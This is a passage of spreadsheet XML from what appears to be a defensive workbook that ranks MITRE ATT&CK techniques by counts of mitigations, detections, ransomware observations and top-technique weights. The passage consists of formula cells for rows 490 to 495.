        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR490" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS490" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT490" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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91" spans="1:47" ht="63.95">
      <c r="A491" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B491" s="25">
        <f>SUM(H491,M491,V491)*(1+SUM(AE491,AG491,AI491,AK491,AM491))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C491" s="25" t="s">
        <v>1769</v>
      </c>
      <c r="D491" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E491" s="25" t="s">
        <v>1770</v>
      </c>
      <c r="F491" s="51">
        <v>1</v>
      </c>
      <c r="G491" s="51">
        <v>1</v>
      </c>
      <c r="H491" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I491">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J491">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K491">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L491">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M491" s="25">
        <v>0</v>
      </c>
      <c r="N491" s="51">
        <v>0</v>
      </c>
      <c r="O491" s="51">
        <v>0</v>
      </c>
      <c r="P491" s="51">
        <v>0</v>
      </c>
      <c r="Q491" s="51">
        <v>0</v>
      </c>
      <c r="R491" s="51"/>
      <c r="S491" s="51">
        <v>0</v>
      </c>
      <c r="T491" s="51"/>
      <c r="U491" s="51">
        <v>0</v>
      </c>
      <c r="V491" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W491">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X491">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y491">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z491">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA491">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB491">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC491" s="29" t="s">
        <v>1771</v>
      </c>
      <c r="AD491" s="25" t="str" cm="1">
        <f t="array" ref="AD491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC491)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE491" s="25">
        <f>IF(AD491="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF491" s="25" t="str" cm="1">
        <f t="array" ref="AF491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC491)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG491" s="25">
        <f>IF(AF491="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH491" s="25" t="str" cm="1">
        <f t="array" ref="AH491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC491)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI491" s="25">
        <f>IF(AH491="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ491" s="25" t="str" cm="1">
        <f t="array" ref="AJ491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC491)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK491" s="25">
        <f>IF(AJ491="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL491" s="25" t="str" cm="1">
        <f t="array" ref="AL491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC491)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM491" s="25">
        <f>IF(AL491="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN491" s="60">
        <v>0</v>
      </c>
      <c r="AO491" s="51">
        <v>0</v>
      </c>
      <c r="AP491" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ491" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR491" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS491" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT491" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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92" spans="1:47" ht="32.1">
      <c r="A492" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B492" s="25">
        <f>SUM(H492,M492,V492)*(1+SUM(AE492,AG492,AI492,AK492,AM492))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C492" s="25" t="s">
        <v>1772</v>
      </c>
      <c r="D492" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E492" s="25" t="s">
        <v>1773</v>
      </c>
      <c r="F492" s="51">
        <v>1</v>
      </c>
      <c r="G492" s="51">
        <v>1</v>
      </c>
      <c r="H492" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I492">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J492">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K492">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L492">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M492" s="25">
        <v>0</v>
      </c>
      <c r="N492" s="51">
        <v>0</v>
      </c>
      <c r="O492" s="51">
        <v>0</v>
      </c>
      <c r="P492" s="51">
        <v>0</v>
      </c>
      <c r="Q492" s="51">
        <v>0</v>
      </c>
      <c r="R492" s="51"/>
      <c r="S492" s="51">
        <v>0</v>
      </c>
      <c r="T492" s="52" t="s">
        <v>1774</v>
      </c>
      <c r="U492" s="51">
        <v>0</v>
      </c>
      <c r="V492" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W492">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X492">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y492">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z492">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA492">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB492">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC492" s="29" t="s">
        <v>1661</v>
      </c>
      <c r="AD492" s="25" t="str" cm="1">
        <f t="array" ref="AD492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC492)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE492" s="25">
        <f>IF(AD492="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF492" s="25" t="str" cm="1">
        <f t="array" ref="AF492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC492)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG492" s="25">
        <f>IF(AF492="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH492" s="25" t="str" cm="1">
        <f t="array" ref="AH492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC492)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI492" s="25">
        <f>IF(AH492="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ492" s="25" t="str" cm="1">
        <f t="array" ref="AJ492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC492)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK492" s="25">
        <f>IF(AJ492="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL492" s="25" t="str" cm="1">
        <f t="array" ref="AL492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC492)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM492" s="25">
        <f>IF(AL492="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN492" s="51"/>
      <c r="AO492" s="51"/>
      <c r="AP492" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ492" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR492" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS492" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT492" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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93" spans="1:47" ht="63.95">
      <c r="A493" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B493" s="25">
        <f>SUM(H493,M493,V493)*(1+SUM(AE493,AG493,AI493,AK493,AM493))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C493" s="25" t="s">
        <v>1775</v>
      </c>
      <c r="D493" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E493" s="25" t="s">
        <v>1776</v>
      </c>
      <c r="F493" s="51">
        <v>1</v>
      </c>
      <c r="G493" s="51">
        <v>1</v>
      </c>
      <c r="H493" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I493">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J493">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K493">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L493">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M493" s="25">
        <v>0</v>
      </c>
      <c r="N493" s="51">
        <v>0</v>
      </c>
      <c r="O493" s="51">
        <v>0</v>
      </c>
      <c r="P493" s="51">
        <v>0</v>
      </c>
      <c r="Q493" s="51">
        <v>0</v>
      </c>
      <c r="R493" s="51"/>
      <c r="S493" s="51">
        <v>0</v>
      </c>
      <c r="T493" s="51"/>
      <c r="U493" s="51">
        <v>0</v>
      </c>
      <c r="V493" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W493">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X493">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y493">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z493">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA493">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB493">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC493" s="29" t="s">
        <v>1777</v>
      </c>
      <c r="AD493" s="25" t="str" cm="1">
        <f t="array" ref="AD493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC493)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE493" s="25">
        <f>IF(AD493="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF493" s="25" t="str" cm="1">
        <f t="array" ref="AF493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC493)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG493" s="25">
        <f>IF(AF493="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH493" s="25" t="str" cm="1">
        <f t="array" ref="AH493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC493)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI493" s="25">
        <f>IF(AH493="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ493" s="25" t="str" cm="1">
        <f t="array" ref="AJ493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC493)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK493" s="25">
        <f>IF(AJ493="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL493" s="25" t="str" cm="1">
        <f t="array" ref="AL493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC493)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM493" s="25">
        <f>IF(AL493="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN493" s="51"/>
      <c r="AO493" s="51"/>
      <c r="AP493" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ493" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR493" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS493" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT493" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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94" spans="1:47">
      <c r="A494" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B494" s="25">
        <f>SUM(H494,M494,V494)*(1+SUM(AE494,AG494,AI494,AK494,AM494))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C494" s="25" t="s">
        <v>1778</v>
      </c>
      <c r="D494" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E494" s="25" t="s">
        <v>1779</v>
      </c>
      <c r="F494" s="51">
        <v>1</v>
      </c>
      <c r="G494" s="51">
        <v>1</v>
      </c>
      <c r="H494" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I494">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J494">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K494">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L494">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M494" s="25">
        <v>0</v>
      </c>
      <c r="N494" s="51">
        <v>0</v>
      </c>
      <c r="O494" s="51">
        <v>0</v>
      </c>
      <c r="P494" s="51">
        <v>0</v>
      </c>
      <c r="Q494" s="51">
        <v>0</v>
      </c>
      <c r="R494" s="51"/>
      <c r="S494" s="51">
        <v>0</v>
      </c>
      <c r="T494" s="51"/>
      <c r="U494" s="51">
        <v>0</v>
      </c>
      <c r="V494" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W494">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X494">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y494">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z494">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA494">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB494">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC494" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD494" s="25" t="str" cm="1">
        <f t="array" ref="AD494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC494)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE494" s="25">
        <f>IF(AD494="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF494" s="25" t="str" cm="1">
        <f t="array" ref="AF494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC494)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG494" s="25">
        <f>IF(AF494="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH494" s="25" t="str" cm="1">
        <f t="array" ref="AH494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC494)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI494" s="25">
        <f>IF(AH494="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ494" s="25" t="str" cm="1">
        <f t="array" ref="AJ494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC494)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK494" s="25">
        <f>IF(AJ494="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL494" s="25" t="str" cm="1">
        <f t="array" ref="AL494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC494)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM494" s="25">
        <f>IF(AL494="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN494" s="51"/>
      <c r="AO494" s="51"/>
      <c r="AP494" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ494" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR494" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS494" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT494" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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95" spans="1:47" ht="32.1">
      <c r="A495" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B495" s="25">
        <f>SUM(H495,M495,V495)*(1+SUM(AE495,AG495,AI495,AK495,AM495))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C495" s="25" t="s">
        <v>1780</v>
      </c>
      <c r="D495" s="25" t="s">
        <v>233</v>
      </c>
      <c r="E495" s="25" t="s">
        <v>1781</v>
      </c>
      <c r="F495" s="51">
        <v>1</v>
      </c>
      <c r="G495" s="51">
        <v>1</v>
      </c>
      <c r="H495" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I495">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J495">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K495">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L495">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M495" s="25">
        <v>0</v>
      </c>
      <c r="N495" s="51">
        <v>0</v>
      </c>
      <c r="O495" s="51">
        <v>0</v>
      </c>
